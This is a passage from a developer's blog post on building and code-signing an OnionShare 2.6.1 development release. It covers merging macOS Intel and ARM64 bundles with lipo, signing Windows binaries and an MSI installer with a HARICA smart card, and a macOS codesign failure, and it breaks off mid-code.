<div class="hll"><pre><span></span>lipo<span class="w"> </span>-create<span class="w"> </span>-output<span class="w"> </span>universal_app<span class="w"> </span>x86_app<span class="w"> </span>arm_app
</pre></div>
<p>At this point in the release I have an Intel app bundle and an ARM64 app bundle. To turn this into a single universal2 app bundle, I just need a simple script that looks through all of the files in both app bundles for binaries to merge, and use <code>lipo</code> to merge them. Hang on while I do that.</p>
<p>🎵 Programming sounds... 🎵</p>
<p>Alright, I've created a new script, <code>desktop/scripts/macos-merge-universal.py</code>, which does just this:</p>
<div class="hll"><pre><span></span><span class="ch">#!/usr/bin/env python3</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">shutil</span>
<span class="kn">import</span> <span class="nn">click</span>
<span class="kn">import</span> <span class="nn">subprocess</span>
<span class="k">def</span> <span class="nf">get_binary_arches</span><span class="p">(</span><span class="n">app_dir</span><span class="p">):</span>
<span class="n">universal</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">silicon</span> <span class="o">=</span> <span class="p">[]</span>
<span class="n">intel</span> <span class="o">=</span> <span class="p">[]</span>
<span class="k">for</span> <span class="n">dirpath</span><span class="p">,</span> <span class="n">dirnames</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">app_dir</span><span class="p">):</span>
<span class="k">for</span> <span class="n">basename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="n">filename</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">dirpath</span><span class="p">,</span> <span class="n">basename</span><span class="p">)</span>
<span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isfile</span><span class="p">(</span><span class="n">filename</span><span class="p">):</span>
<span class="n">out</span> <span class="o">=</span> <span class="n">subprocess</span><span class="o">.</span><span class="n">check_output</span><span class="p">([</span><span class="s2">"file"</span><span class="p">,</span> <span class="n">filename</span><span class="p">])</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s2">"utf-8"</span><span class="p">)</span>
<span class="k">if</span> <span class="p">(</span>
<span class="s2">"Mach-O 64-bit executable"</span> <span class="ow">in</span> <span class="n">out</span>
<span class="ow">or</span> <span class="s2">"Mach-O 64-bit bundle"</span> <span class="ow">in</span> <span class="n">out</span>
<span class="ow">or</span> <span class="s2">"Mach-O 64-bit dynamically linked shared library"</span> <span class="ow">in</span> <span class="n">out</span>
<span class="p">):</span>
<span class="n">arm64</span><span class="p">,</span> <span class="n">x86</span> <span class="o">=</span> <span class="kc">False</span><span class="p">,</span> <span class="kc">False</span>
<span class="k">if</span> <span class="s2">"arm64"</span> <span class="ow">in</span> <span class="n">out</span><span class="p">:</span>
<span class="n">arm64</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="s2">"x86_64"</span> <span class="ow">in</span> <span class="n">out</span><span class="p">:</span>
<span class="n">x86</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">if</span> <span class="n">arm64</span> <span class="ow">and</span> <span class="n">x86</span><span class="p">:</span>
<span class="n">universal</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">arm64</span><span class="p">:</span>
<span class="n">silicon</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="k">elif</span> <span class="n">x86</span><span class="p">:</span>
<span class="n">intel</span><span class="o">.</span><span class="n">append</span><span class="p">(</span><span class="n">filename</span><span class="p">)</span>
<span class="k">return</span> <span class="n">universal</span><span class="p">,</span> <span class="n">silicon</span><span class="p">,</span> <span class="n">intel</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"intel_app"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">click</span><span class="o">.</span><span class="n">Path</span><span class="p">(</span><span class="n">exists</span><span class="o">=</span><span class="kc">True</span><span class="p">))</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"silicon_app"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">click</span><span class="o">.</span><span class="n">Path</span><span class="p">(</span><span class="n">exists</span><span class="o">=</span><span class="kc">True</span><span class="p">))</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"output_app"</span><span class="p">,</span> <span class="nb">type</span><span class="o">=</span><span class="n">click</span><span class="o">.</span><span class="n">Path</span><span class="p">(</span><span class="n">exists</span><span class="o">=</span><span class="kc">False</span><span class="p">))</span>
<span class="k">def</span> <span class="nf">main</span><span class="p">(</span><span class="n">intel_app</span><span class="p">,</span> <span class="n">silicon_app</span><span class="p">,</span> <span class="n">output_app</span><span class="p">):</span>
<span class="c1"># Get the list of binaries in each app</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Looking up binaries from Intel app:"</span><span class="p">,</span> <span class="n">intel_app</span><span class="p">)</span>
<span class="n">intel_universal</span><span class="p">,</span> <span class="n">intel_silicon</span><span class="p">,</span> <span class="n">intel_intel</span> <span class="o">=</span> <span class="n">get_binary_arches</span><span class="p">(</span><span class="n">intel_app</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Looking up binaries from Silicon app:"</span><span class="p">,</span> <span class="n">silicon_app</span><span class="p">)</span>
<span class="n">silicon_universal</span><span class="p">,</span> <span class="n">silicon_silicon</span><span class="p">,</span> <span class="n">silicon_intel</span> <span class="o">=</span> <span class="n">get_binary_arches</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">)</span>
<span class="c1"># Find which binaries should be merged</span>
<span class="n">intel_intel_filenames</span> <span class="o">=</span> <span class="p">[</span><span class="n">i</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">intel_app</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="p">:]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">intel_intel</span><span class="p">]</span>
<span class="n">silicon_silicon_filenames</span> <span class="o">=</span> <span class="p">[</span><span class="n">i</span><span class="p">[</span><span class="nb">len</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">)</span> <span class="o">+</span> <span class="mi">1</span> <span class="p">:]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">silicon_silicon</span><span class="p">]</span>
<span class="n">intersection</span> <span class="o">=</span> <span class="nb">set</span><span class="p">(</span><span class="n">intel_intel_filenames</span><span class="p">)</span><span class="o">.</span><span class="n">intersection</span><span class="p">(</span>
<span class="nb">set</span><span class="p">(</span><span class="n">silicon_silicon_filenames</span><span class="p">)</span>
<span class="p">)</span>
<span class="c1"># Copy the Silicon app to the output app</span>
<span class="nb">print</span><span class="p">(</span><span class="s2">"Copying the app bundle for the output app"</span><span class="p">)</span>
<span class="n">shutil</span><span class="o">.</span><span class="n">copytree</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">,</span> <span class="n">output_app</span><span class="p">,</span> <span class="n">symlinks</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span>
<span class="c1"># Merge them</span>
<span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">intersection</span><span class="p">:</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Merging </span><span class="si">{</span><span class="n">filename</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="n">intel_binary</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">intel_app</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="n">silicon_binary</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">silicon_app</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="n">output_binary</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">output_app</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="n">subprocess</span><span class="o">.</span><span class="n">run</span><span class="p">(</span>
<span class="p">[</span><span class="s2">"lipo"</span><span class="p">,</span> <span class="s2">"-create"</span><span class="p">,</span> <span class="n">intel_binary</span><span class="p">,</span> <span class="n">silicon_binary</span><span class="p">,</span> <span class="s2">"-output"</span><span class="p">,</span> <span class="n">output_binary</span><span class="p">]</span>
<span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"Merge complete: </span><span class="si">{</span><span class="n">output_app</span><span class="si">}</span><span class="s2">"</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s2">"__main__"</span><span class="p">:</span>
<span class="n">main</span><span class="p">()</span>
</pre></div>
<p>I put the ARM64 app bundle in a folder called <code>~/tmp/arm64</code> and the Intel app bundle in <code>~/tmp/intel</code>, and I made a new empty folder called <code>~/tmp/universal2</code>. Let's see this script in action:</p>
<pre><code>% poetry run ./scripts/macos-merge-universal.py ~/tmp/intel/OnionShare.app ~/tmp/arm64/OnionShare.app ~/tmp/universal2/OnionShare.app
Looking up binaries from Intel app: /Users/user/tmp/intel/OnionShare.app
Looking up binaries from Silicon app: /Users/user/tmp/arm64/OnionShare.app
Copying the app bundle for the output app
Merging Contents/Resources/lib/psutil/_psutil_posix.abi3.so
Merging Contents/Resources/lib/zope/interface/_zope_interface_coptimizations.cpython-311-darwin.so
Merging Contents/Resources/lib/psutil/_psutil_osx.abi3.so
Merging Contents/Resources/lib/libiodbc.2.dylib
Merging Contents/Resources/lib/charset_normalizer/md.cpython-311-darwin.so
Merging Contents/MacOS/onionshare
Merging Contents/MacOS/onionshare-cli
Merging Contents/Resources/lib/charset_normalizer/md__mypyc.cpython-311-darwin.so
Merging Contents/Resources/lib/_cffi_backend.cpython-311-darwin.so
Merge complete: /Users/user/tmp/universal2/OnionShare.app
</code></pre>
<p>It found that <code>onionshare-cli</code> and <code>onionshare</code> needed to be merged, but it also found a bunch of other binaries that needed merging too which I didn't know about. I also expected that I'd have to merge all of the pluggable transports that I built with Go (<code>obfs4proxy</code>, <code>snowflake-client</code>, and <code>meek-client</code>) but was pleasantly surprised to find that I didn't have to. It turns out that if you're using the ARM64 Go compiler, it makes universal2 binaries by default.</p>
<p>As a final test, I copied my new universal2 binary to my two machines (my physical Intel Mac build machine, and my new ARM64 Mac VM) and tried running it in both places to make sure it would work. They work!</p>
<p>As a final step, I updated <code>RELEASE.md</code> with instructions on how to make the ARM64 app bundle, and how to merge them into a universal2 app bundle.</p>
<h2 id="making-a-development-release">Making a development release</h2><p>If this release weren't such an epic slog I would maybe just go ahead and make the final OnionShare 2.6.1 release. But as it is, I think it's much safer to make a development release, with development binaries and a development tag, and have the other OnionShare devs test it out and review my PR before making the actual release. So I decided that right now I'm going to release version 2.6.1.dev1.</p>
<p>I updated the version string from <code>2.6.1</code> to <code>2.6.1.dev1</code> in all of the places I've documented at the top of <code>RELEASE.md</code>, committed this, and then made a signed git tag:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>tag<span class="w"> </span>-s<span class="w"> </span>v2.6.1.dev1
</pre></div>
<p>I pushed my commits and my new tag, and waited for the GitHub Actions workflow to finish creating builds.</p>
<h3 id="windows-release">Windows release</h3><p>I switched to my Ubuntu computer and booted my Windows 11 VM that I <a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release-part-2/#setting-up-windows-for-onionshare-development">created in part 2</a> while troubleshooting the Windows build.</p>
<p>I'll start by running <code>git fetch</code>, verifying the PGP signature on the <code>v2.6.1.dev1</code> tag I just created, and checking out that tag, so I'm sure I'm working from the correct branch.</p>
<p><img src="windows-verify-tag.png" alt="Verifying the git tag in Windows"></p>
<p>Last time I had set up a Windows development environment for OnionShare, but there's still a few more things I need to install to actually make a release. Also, I need to learn how to use my new HARICA smart card, which I haven't used yet! I'm going to start with that, setting up HARICA.</p>
<h4 id="setting-up-the-harica-smart-card">Setting up the HARICA smart card</h4><p>I got this USB smart card from HARICA, but that's the extent of my experience with this CA.</p>
<p><img src="harica-smartcard.jpg" alt="HARICA smart card"></p>
<p>I plugged it into my computer and then used VirtualBox to set up USB passthrough to pass it to the Windows VM. VirtualBox sees this device as "SafeNet Token JC".</p>
<p>I followed the instructions that HARICA sent when we ordered the code signing certificate: I installed the SafeNet Authentication Client software, logged into the HARICA control panel and downloaded the signed certificate, and then I used the SafeNet client software to import it into the smart card. I also changed the token password (PIN) and administrator password (PUK) on my smart card.</p>
<p><img src="safenet-software.png" alt="Viewing the smart card info"></p>
<p>Note that the token name is Science and Design Inc. As I mentioned in <a href="https://micahflee.com/2023/09/what-goes-into-making-an-onionshare-release/">part 1</a>, the new nonprofit <a href="https://scidsg.org/">Science & Design</a>, founded by Glenn Sorrentino (who designed the beautiful OnionShare UX!), has taken on the role of fiscal sponsor for OnionShare. They purchased the new code signing certificate from HARICA.</p>
<p>Now let's see if it works. In a Developer PowerShell for VS window:</p>
<div class="hll"><pre><span></span><span class="nb">cp </span><span class="n">C</span><span class="p">:\</span><span class="n">Windows</span><span class="p">\</span><span class="n">System32</span><span class="p">\</span><span class="n">calc</span><span class="p">.</span><span class="n">exe</span> <span class="p">.</span>
<span class="n">signtool</span><span class="p">.</span><span class="n">exe</span> <span class="p">/</span><span class="n">v</span> <span class="p">/</span><span class="n">d</span> <span class="s2">"Calc test"</span> <span class="p">/</span><span class="n">n</span> <span class="s2">"Science and Design Inc."</span> <span class="p">/</span><span class="n">fd</span> <span class="n">sha256</span> <span class="p">/</span><span class="n">td</span> <span class="n">sha256</span> <span class="p">/</span><span class="n">tr</span> <span class="p">/</span><span class="n">tr</span> <span class="n">http</span><span class="p">://</span><span class="n">timestamp</span><span class="p">.</span><span class="n">digicert</span><span class="p">.</span><span class="n">com</span> <span class="n">calc</span><span class="p">.</span><span class="n">exe</span>
</pre></div>
<p>I copied <code>calc.exe</code> into my home folder and then used <code>signtool.exe</code> to digitally sign it.</p>
<p><img src="signtool-calc.png" alt="Signing calc.exe"></p>
<p>The SafeNet Authentication Client popped up a window asking for my token password. I entered it, and then the secret key on my smart card digitally signed <code>calc.exe</code>. I inspected the digital signature, and it works!</p>
<p><img src="calc-signature.png" alt="Viewing digital signature info for calc.exe"></p>
<h4 id="code-signing-and-packaging">Code signing and packaging</h4><p>The instructions from <code>RELEASE.md</code> say to install the Windows SDK, to install the .NET Framework 3.5 SP1 Runtime, and to install WiX 3.11, which is the software I use to create the Windows MSI package.</p>
<p>It looks like since the last OnionShare release there's been a major update in <a href="https://wixtoolset.org/">WiX</a> and now version 4 is out. Upgrading from WiX 3 to 4 looks like a huge project, so I'm going to skip that for this release and still use the older version of WiX, but it's a good thing to focus on in the future. You can still find information on using WiX 3.11 <a href="https://wixtoolset.org/docs/wix3/">here</a> -- I updated the <code>RELEASE.md</code> docs slightly to reflect this.</p>
<p>So, I went ahead and installed the Windows SDK, installed .NET 3.5, and installed WiX 3.11.</p>
<p>The next step in <code>RELEASE.md</code> is to download the Windows binaries from GitHub Actions, so I downloaded the <code>win64-build</code> artifact from GitHub and extracted it into my Downloads folder. The <code>RELEASE.md</code> instructions say to run these commands:</p>
<div class="hll"><pre><span></span><span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="n">build-windows</span><span class="p">.</span><span class="n">py</span> <span class="n">codesign</span> <span class="no">[path]</span>
<span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="n">build-windows</span><span class="p">.</span><span class="n">py</span> <span class="n">package</span> <span class="no">[path]</span>
</pre></div>
<p>The first command uses <code>signtool.exe</code> to digitally sign all of the binaries (<code>onionshare.exe</code>, <code>onionshare-cli.exe</code>, <code>obfs4proxy.exe</code>, <code>meek-client.exe</code>, and <code>snowflake-client.exe</code>). The second command uses the WiX toolset to create the MSI.</p>
<p>Before running the codesign command though, I updated the <code>sign()</code> function in <code>build-windows.py</code> so that it will use the new Science & Design certificate, instead of the old one (which was from a CA called Certum, under the name "Open Source Developer, Micah Lee").</p>
<p>Then I ran:</p>
<div class="hll"><pre><span></span><span class="n">poetry</span> <span class="n">run</span> <span class="n">python</span> <span class="p">.\</span><span class="n">scripts</span><span class="p">\</span><span class="n">build-windows</span><span class="p">.</span><span class="n">py</span> <span class="n">codesign</span> <span class="n">C</span><span class="p">:\</span><span class="n">Users</span><span class="p">\</span><span class="n">dev</span><span class="p">\</span><span class="n">Downloads</span><span class="p">\</span><span class="n">onionshare-win64</span><span class="p">\</span>
</pre></div>
<p>And it worked! It prompted me for the token password for each binary it signed, and one by one it signed them all. Then I ran the <code>build-windows.py package</code> command:</p>
<pre><code>PS C:\Users\dev\code\onionshare\desktop> poetry run python .\scripts\build-windows.py package C:\Users\dev\Downloads\onionshare-win64\
> Build the WiX file
> Build the MSI
['C:\\Program Files (x86)\\WiX Toolset v3.11\\bin\\candle.exe', 'OnionShare.wxs']
Windows Installer XML Toolset Compiler version 3.11.2.4516
Copyright (c) .NET Foundation and contributors. All rights reserved.
OnionShare.wxs
['C:\\Program Files (x86)\\WiX Toolset v3.11\\bin\\light.exe', '-ext', 'WixUIExtension', 'OnionShare.wixobj']
Windows Installer XML Toolset Linker version 3.11.2.4516
Copyright (c) .NET Foundation and contributors. All rights reserved.
C:\Users\dev\Downloads\onionshare-win64\OnionShare.wxs(16) : warning LGHT1076 : ICE61: This product should remove only older versions of itself. The Maximum version is not less than the current product. (2.6.1 2.6.1)
> Prepare OnionShare.msi for signing
['C:\\Program Files (x86)\\WiX Toolset v3.11\\bin\\insignia.exe', '-im', 'C:\\Users\\dev\\Downloads\\onionshare-win64\\OnionShare.msi']
Windows Installer XML Toolset Inscriber version 3.11.2.4516
Copyright (c) .NET Foundation and contributors. All rights reserved.
> Signing C:\Users\dev\Downloads\onionshare-win64\OnionShare.msi
['C:\\Program Files (x86)\\Windows Kits\\10\\bin\\10.0.22621.0\\\\x64\\signtool.exe', 'sign', '/v', '/d', 'OnionShare', '/n', 'Science and Design Inc.', '/fd', 'sha256', '/td', 'sha256', '/tr', 'http://timestamp.digicert.com', 'C:\\Users\\dev\\Downloads\\onionshare-win64\\OnionShare.msi']
The following certificate was selected:
Issued to: Science and Design Inc.
Issued by: HARICA Code Signing RSA
Expires: Thu Jul 17 23:30:04 2025
SHA1 hash: 0BD01CB561295C13EC72FF5ED7BB1AF65C70B723
Done Adding Additional Store
Successfully signed: C:\Users\dev\Downloads\onionshare-win64\OnionShare.msi
Number of files successfully Signed: 1
Number of warnings: 0
Number of errors: 0
> Final MSI: C:\Users\dev\code\onionshare\desktop\dist\OnionShare-win64-2.6.1.dev1.msi
</code></pre>
<p>This worked too. The final step code signed the MSI, and I was prompted for my token password. Now I have the final installer package, <code>OnionShare-win64-2.6.1.dev1.msi</code>. When I double-click it, it opens the installer.</p>
<p><img src="windows-installer.png" alt="OnionShare Windows installer"></p>
<p>And User Access Control asks if I want to install OnionShare, listing Science and Design Inc. as the verified publisher.</p>
<p><img src="windows-uac.png" alt="OnionShare UAC"></p>
<p>The install finishes successfully! Ahh, but there's a problem. It installed it in <code>C:\Program Files (x86)\OnionShare</code>, but that's where 32-bit Windows software is supposed to go. When we upgraded to PySide 6 we decided to stop releasing 32-bit Windows versions, since PySide 6 doesn't support it. The install should be putting OnionShare in <code>C:\Program Files</code>, not <code>C:\Program Files (x86)</code>.</p>
<p>I uninstalled OnionShare and then went to work updating <code>build-windows.py</code> to support installing installing in <code>Program Files</code> instead. I won't bore you with the debugging details, but basically, this patch did it:</p>
<div class="hll"><pre><span></span><span class="gh">diff --git a/desktop/scripts/build-windows.py b/desktop/scripts/build-windows.py</span>
<span class="gh">index 224af59b..9579b81d 100644</span>
<span class="gd">--- a/desktop/scripts/build-windows.py</span>
<span class="gi">+++ b/desktop/scripts/build-windows.py</span>
<span class="gu">@@ -117,6 +117,7 @@ def wix_build_dir_xml(root, data):</span>
<span class="w"> </span> "Component",
<span class="w"> </span> Id="ApplicationShortcuts",
<span class="w"> </span> Guid="539e7de8-a124-4c09-aa55-0dd516aad7bc",
<span class="gi">+ Win64="yes",</span>
<span class="w"> </span> )
<span class="w"> </span> ET.SubElement(
<span class="w"> </span> component_el,
<span class="gu">@@ -152,6 +153,7 @@ def wix_build_components_xml(root, data):</span>
<span class="w"> </span> "Component",
<span class="w"> </span> Id=subdata["component_id"],
<span class="w"> </span> Guid=subdata["component_guid"],
<span class="gi">+ Win64="yes",</span>
<span class="w"> </span> )
<span class="w"> </span> for filename in subdata["files"]:
<span class="w"> </span> file_el = ET.SubElement(
<span class="gu">@@ -180,7 +182,7 @@ def msi_package(build_path, msi_path, product_update_code):</span>
<span class="w"> </span> "name": "SourceDir",
<span class="w"> </span> "dirs": [
<span class="w"> </span> {
<span class="gd">- "id": "ProgramFilesFolder",</span>
<span class="gi">+ "id": "ProgramFiles64Folder",</span>
<span class="w"> </span> "dirs": [],
<span class="w"> </span> },
<span class="w"> </span> {
<span class="gu">@@ -218,10 +220,11 @@ def msi_package(build_path, msi_path, product_update_code):</span>
<span class="w"> </span> Keywords="Installer",
<span class="w"> </span> Description="OnionShare $(var.ProductVersion) Installer",
<span class="w"> </span> Manufacturer="Micah Lee, et al.",
<span class="gd">- InstallerVersion="100",</span>
<span class="gi">+ InstallerVersion="200",</span>
<span class="w"> </span> Languages="1033",
<span class="w"> </span> Compressed="yes",
<span class="w"> </span> SummaryCodepage="1252",
<span class="gi">+ Platform="x64",</span>
<span class="w"> </span> )
<span class="w"> </span> ET.SubElement(product_el, "Media", Id="1", Cabinet="product.cab", EmbedCab="yes")
<span class="w"> </span> ET.SubElement(
</pre></div>
<p>I re-ran the <code>build-windows.py package</code> command and it created a new signed MSI installer. I installed this one, and I confirmed that it successfully installed in <code>C:\Program Files\OnionShare</code>. I then ran it OnionShare from the Start menu:</p>
<p><img src="windows-installed.png" alt="Running the final signed and installed OnionShare in Windows"></p>
<p>Nice! The Windows development release is done.</p>
<h3 id="macos-release">macOS release</h3><p>Time to do the macOS release. First, I'll start with manually building the Apple Silicon app bundle.</p>
<h4 id="building-the-apple-silicon-app-bundle">Building the Apple Silicon app bundle</h4><p>Back on my Apple Silicon Mac computer, I booted up my macOS development VM. I opened a terminal, changed to the <code>onionshare</code> folder, verified the PGP signature on <code>v2.6.1.dev1</code> tag, and checked it out:</p>
<div class="hll"><pre><span></span>git<span class="w"> </span>fetch
git<span class="w"> </span>tag<span class="w"> </span>-v<span class="w"> </span>v2.6.1.dev1
git<span class="w"> </span>checkout<span class="w"> </span>v2.6.1.dev1
</pre></div>
<p>Following the instructions in <code>RELEASE.md</code>, I made sure all of the dependencies are installed and compiled:</p>
<div class="hll"><pre><span></span><span class="nb">cd</span><span class="w"> </span>desktop
python3<span class="w"> </span>-m<span class="w"> </span>pip<span class="w"> </span>install<span class="w"> </span>poetry
poetry<span class="w"> </span>install
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/get-tor.py<span class="w"> </span>macos
./scripts/build-pt-obfs4proxy.sh
./scripts/build-pt-snowflake.sh
./scripts/build-pt-meek.sh
</pre></div>
<p>After re-installing Poetry deps, I also patched cx_Freeze in the Poetry virtual environment to include the changes I made in <a href="https://github.com/marcelotduarte/cx_Freeze/pull/2102">my PR</a> (which I just noticed has been merged!).</p>
<p>Then I followed the instructions to create the Apple Silicon app bundle:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./setup-freeze.py<span class="w"> </span>bdist_mac
rm<span class="w"> </span>-rf<span class="w"> </span>build/OnionShare.app/Contents/Resources/lib
mv<span class="w"> </span>build/exe.macosx-10.9-universal2-3.11/lib<span class="w"> </span>build/OnionShare.app/Contents/Resources/
poetry<span class="w"> </span>run<span class="w"> </span>python<span class="w"> </span>./scripts/build-macos.py<span class="w"> </span>cleanup-build
</pre></div>
<p>And I end up with an Apple Silicon <code>OnionShare.app</code> app bundle. I opened Finder, found my newly created app bundle, and right-clicked on it to compress it. I then transferred <code>OnionShare.app.zip</code> out of my VM and onto my older Intel Mac that has my Apple Developer signing keys on it, which I'm using as a dedicated build machine.</p>
<h4 id="creating-the-universal2-app-bundle">Creating the universal2 app bundle</h4><p>I manually made the Apple Silicon app bundle, but my GitHub Actions workflow made the Intel one for me. I downloaded the <code>mac-intel-build</code> artifact from GitHub and copied that to my dedicated build machine too.</p>
<p>On my build computer, I created a folder in my desktop called <code>v2.6.1.dev1</code> with the following structure:</p>
<pre><code>Desktop/
└── v2.6.1.dev1/
├── intel/
│ └── OnionShare.app
└── silicon/
└── OnionShare.app
</code></pre>
<p>Then I merged the ARM64 and Intel app bundles into a single universal2 bundle:</p>
<div class="hll"><pre><span></span>poetry<span class="w"> </span>run<span class="w"> </span>./scripts/macos-merge-universal.py<span class="w"> </span>~/Desktop/v2.6.1.dev1/intel<span class="w"> </span>~/Desktop/v2.6.1.dev1/silicon<span class="w"> </span>~/Desktop/v2.6.1.dev1/universal2
</pre></div>
<p>I then code signed it using my Apple Developer signing keys:</p>
<pre><code>% poetry run python ./scripts/build-macos.py codesign ~/Desktop/v2.6.1.dev1/universal2/OnionShare.app
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Resources/lib/_sqlite3.cpython-311-darwin.so'] # cwd=None
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Resources/lib/_sqlite3.cpython-311-darwin.so: replacing existing signature
['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Resources/lib/_scproxy.cpython-311-darwin.so'] # cwd=None
--snip--
/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Frameworks/QtCore.framework/Versions/A/QtCore: No such file or directory
Traceback (most recent call last):
File "/Users/user/code/onionshare/desktop/./scripts/build-macos.py", line 303, in <module>
main()
--snip--
subprocess.CalledProcessError: Command '['codesign', '--sign', 'Developer ID Application: Micah Lee (N9B95FDWH4)', '--entitlements', '/Users/user/code/onionshare/desktop/package/Entitlements.plist', '--timestamp', '--deep', '--force', '--options', 'runtime,library', '/Users/user/Desktop/v2.6.1.dev1/universal2/OnionShare.app/Contents/Frameworks/QtCore.framework/Versions/A/QtCore']' returned non-zero exit status 1.
</code></pre>
<p>Oops. It looks like it's trying to sign <code>OnionShare.app/Contents/Frameworks/QtCore.framework/Versions/A/QtCore</code>, but that file doesn't exist.</p>
<h4 id="fixing-macos-code-signing">Fixing macOS code signing</h4><p>Let's pull up the code...</p>
<div class="hll"><pre><span></span><span class="nd">@main</span><span class="o">.</span><span class="n">command</span><span class="p">()</span>
<span class="nd">@click</span><span class="o">.</span><span class="n">argument</span><span class="p">(</span><span class="s2">"app_path"</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">codesign</span><span class="p">(</span><span class="n">app_path</span><span class="p">):</span>
<span class="w"> </span><span class="sd">"""Sign macOS binaries before packaging"""</span>
<span class="k">for</span> <span class="n">path</span> <span class="ow">in</span> <span class="n">itertools</span><span class="o">.</span><span class="n">chain</span><span class="p">(</span>
<span class="n">glob</span><span class="o">.</span><span class="n">glob</span><span class="p">(</span><span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/**/*.so"</span><span class="p">,</span> <span class="n">recursive</span><span class="o">=</span><span class="kc">True</span><span class="p">),</span>
<span class="n">glob</span><span class="o">.</span><span class="n">glob</span><span class="p">(</span><span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/**/*.dylib"</span><span class="p">,</span> <span class="n">recursive</span><span class="o">=</span><span class="kc">True</span><span class="p">),</span>
<span class="p">[</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtCore.framework/Versions/A/QtCore"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtDBus.framework/Versions/A/QtDBus"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtGui.framework/Versions/A/QtGui"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Frameworks/QtWidgets.framework/Versions/A/QtWidgets"</span><span class="p">,</span>
<span class="sa">f</span><span class="s2">"</span><span class="si">{</span><span class="n">app_path</span><span class="si">}</span><span class="s2">/Contents/Resources/lib/Python"</span><span class="p">,</span>
